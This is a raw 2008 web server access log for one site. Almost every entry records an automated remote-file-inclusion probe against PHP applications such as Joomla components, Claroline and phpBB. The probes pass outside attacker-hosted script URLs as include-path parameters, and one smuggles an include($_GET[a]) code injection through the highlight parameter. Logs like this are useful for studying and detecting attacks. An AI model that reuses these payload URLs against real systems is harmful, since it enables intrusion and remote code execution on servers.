193.40.160.3 - - [17/Apr/2008:13:03:22 -0700] "GET /logs//intern/config/forum.php?rootdir=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
193.40.160.3 - - [17/Apr/2008:13:03:24 -0700] "GET //intern/config/forum.php?rootdir=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:13:04:00 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.32.94.50 - - [17/Apr/2008:13:04:14 -0700] "GET /logs/access_080321.log//admin/classes/TplLoad.php?full_path_to_public_program=http://mariosilva.freehostia.com/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.93.56.80 - - [17/Apr/2008:13:04:16 -0700] "GET /logs/access_080321.log/admin/classes/TplLoad.php?full_path_to_public_program=http://h1.ripway.com/finkel/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:04:44 -0700] "GET /logs/access.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:04:46 -0700] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:04:47 -0700] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:04:48 -0700] "GET /logs/access_080226.log/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
63.247.139.40 - - [17/Apr/2008:13:05:00 -0700] "GET /logs/access_080313.log/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.40 - - [17/Apr/2008:13:05:02 -0700] "GET /index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.139.40 - - [17/Apr/2008:13:05:02 -0700] "GET /logs/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:05:19 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
63.247.139.40 - - [17/Apr/2008:13:06:45 -0700] "GET /logs/access_080207.log/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:06:52 -0700] "GET /skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:06:52 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "dmulk.com"
216.97.43.58 - - [17/Apr/2008:13:07:06 -0700] "GET /logs/access_080218.log/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:13:07:07 -0700] "GET /logs/access_080218.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:13:07:35 -0700] "GET /logs/access_080119.log/admin.php?PHPFFL_FILE_ROOT=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:13:07:36 -0700] "GET /admin.php?PHPFFL_FILE_ROOT=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:13:07:37 -0700] "GET /logs/admin.php?PHPFFL_FILE_ROOT=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [17/Apr/2008:13:07:59 -0700] "GET /logs/access_080123.log/admin.php?PHPFFL_FILE_ROOT=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.40.160.3 - - [17/Apr/2008:13:12:27 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
193.40.160.3 - - [17/Apr/2008:13:12:28 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:13:34 -0700] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:13:35 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:13:36 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:13:48 -0700] "GET /logs/access_080120.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:13:51 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:13:51 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.103.23.40 - - [17/Apr/2008:13:14:02 -0700] "GET /logs/encapscms_PATH/core/core.php?root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [17/Apr/2008:13:14:02 -0700] "GET /encapscms_PATH/core/core.php?root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.212.16.163 - - [17/Apr/2008:13:14:12 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:13:14:13 -0700] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:13:14:13 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.102.118.147 - - [17/Apr/2008:13:14:13 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [17/Apr/2008:13:14:24 -0700] "GET /logs/encapscms_PATH/core/core.php?root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [17/Apr/2008:13:14:25 -0700] "GET /encapscms_PATH/core/core.php?root=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:14:40 -0700] "GET //atom.php5?page=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:14:40 -0700] "GET /logs//atom.php5?page=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:13:14:53 -0700] "GET /logs/access_080321.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:13:14:54 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:13:14:54 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:15:08 -0700] "GET /logs//atom.php5?page=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:15:08 -0700] "GET //atom.php5?page=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:15:33 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:15:33 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:16:01 -0700] "GET /logs/access.log//includes/settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:16:01 -0700] "GET //includes/settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:16:02 -0700] "GET /logs//includes/settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.201.13.98 - - [17/Apr/2008:13:16:41 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
67.201.13.98 - - [17/Apr/2008:13:16:43 -0700] "GET //index.php?option=com_custompages&cpage=http://www.sghummeltal.de//components/com_simpleboard/uploaded/tetas.jpg?? HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
77.92.150.60 - - [17/Apr/2008:13:16:48 -0700] "GET /logs/access_080123.log//includes/settings.inc.php?include_path=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.172.10 - - [17/Apr/2008:13:17:01 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://nad.nad.hostagig.com/.../data/456.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.37.173.162 - - [17/Apr/2008:13:17:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
200.37.173.162 - - [17/Apr/2008:13:17:06 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:07 -0700] "GET /logs//claroline/phpbb/page_tail.php?includePath=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:07 -0700] "GET //claroline/phpbb/page_tail.php?includePath=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:09 -0700] "GET /logs//claroline/tracking/userLog.php?rootSys=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:09 -0700] "GET //claroline/tracking/userLog.php?rootSys=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.6.23.98 - - [17/Apr/2008:13:17:11 -0700] "GET /minamijewelry/bird.psd HTTP/1.0" 200 109644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:13:17:26 -0700] "GET /logs//tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
217.195.114.88 - - [17/Apr/2008:13:17:29 -0700] "GET //tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:46 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:46 -0700] "GET //Neos_Chronos/header.php?base_folder=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:48 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:17:48 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
217.70.133.38 - - [17/Apr/2008:13:17:54 -0700] "GET /logs/access_080302.log//trans/trans.php?trans=ko&page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.70.133.38 - - [17/Apr/2008:13:17:54 -0700] "GET //trans/trans.php?trans=ko&page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.70.133.38 - - [17/Apr/2008:13:17:55 -0700] "GET /logs//trans/trans.php?trans=ko&page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:18:04 -0700] "GET /logs/access_080324.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:18:05 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:18:05 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:18:49 -0700] "GET /logs/access_080123.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:18:58 -0700] "GET //Neos_Chronos/header.php?base_folder=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
87.106.68.149 - - [17/Apr/2008:13:18:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://212.115.13.140:82//appserv/r.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:13:19:10 -0700] "GET /logs/access_080218.log/include/functions_common.php?gl_root_path=http://www.forpinkpussy.com/languages/.inc/read.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.97.43.58 - - [17/Apr/2008:13:19:11 -0700] "GET /logs/access_080218.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:20:05 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:20:05 -0700] "GET /logs/access_080306.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:20:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:20:05 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:20:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:20:05 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:20:35 -0700] "GET /logs/access_080302.log/index.php?pageurl=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:20:37 -0700] "GET /index.php?pageurl=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:13:20:38 -0700] "GET /logs/index.php?pageurl=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.46.2 - - [17/Apr/2008:13:21:06 -0700] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:13:21:06 -0700] "GET /logs/access_080211.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.146.46.2 - - [17/Apr/2008:13:21:21 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:21:31 -0700] "GET /logs/access_080219.log/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
78.90.30.31 - - [17/Apr/2008:13:21:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 200 4139 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:21:34 -0700] "GET /index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 200 11606 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:21:35 -0700] "GET /logs/index.php?option=com_jd-wp&Itemid=&mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
78.90.30.31 - - [17/Apr/2008:13:21:35 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://priottalo.altervista.org/php5/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:21:37 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.230.212.199 - - [17/Apr/2008:13:21:44 -0700] "GET /logs/access_080329.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.chandonai.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:13:22:38 -0700] "GET /logs/access.log//popup_window.php?site_isp_root=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:13:22:38 -0700] "GET //popup_window.php?site_isp_root=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.93.132.138 - - [17/Apr/2008:13:22:38 -0700] "GET /logs//popup_window.php?site_isp_root=http://iulian.pokol.hu/iuli/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:22:42 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:22:43 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:22:43 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:13:23:30 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
